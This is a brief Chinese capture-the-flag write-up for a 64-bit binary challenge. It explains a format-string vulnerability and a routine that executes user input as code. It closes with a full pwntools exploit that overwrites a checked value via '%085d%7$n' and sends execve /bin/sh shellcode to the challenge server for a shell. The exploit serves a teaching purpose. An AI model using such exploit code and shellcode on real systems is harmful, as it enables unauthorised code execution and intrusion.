64位的格式化串还没做过,导致做了半天。
拿到题目检查下防护:
开启了canary。
简单运行看了下程序逻辑后放到IDA里:
为了方便看,部分变量名已修改:
sub_400A70这个函数里没啥问题。
输入east退出来。进入east函数:
里面有个格式化串的漏洞:
继续往下看:
关键在:
将输入的这个字符串的首地址强制转化为函数指针后调用他。
看汇编清楚点:
那这里就可以读入shellcode,然后再调用shellcode即可。
想要触发这个模块,需要
从main函数可以看到:
已经将地址给泄露出来了,只需要用格式化串漏洞,将其修改为85即可。
exp如下:
from pwn import *
#a=process("./string")
#gdb.attach(a,"b *0x0000000000400C72")
a=remote("111.198.29.45","30230")
a.recvuntil("secret[0] is ")
v3_addr=a.recvuntil("\n")
v3_addr="0x"+v3_addr[:-1]
v3_address=eval(v3_addr)
print (hex(v3_address))
a.recvuntil("What should your character's name be:\n")
a.sendline("a")
a.recvuntil("So, where you will go?east or up?:\n")
a.send("east\n")
a.recvuntil("go into there(1), or leave(0)?:\n")
a.send("1\n")
a.recvuntil("'Give me an address'\n")
a.send(str(v3_address)+"\n")
a.recvuntil("you wish is:\n")
payload="%085d%7$n"
a.sendline(payload)
a.recvuntil("Wizard: I will help you! USE YOU SPELL\n")
a.sendline("\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05")
a.interactive();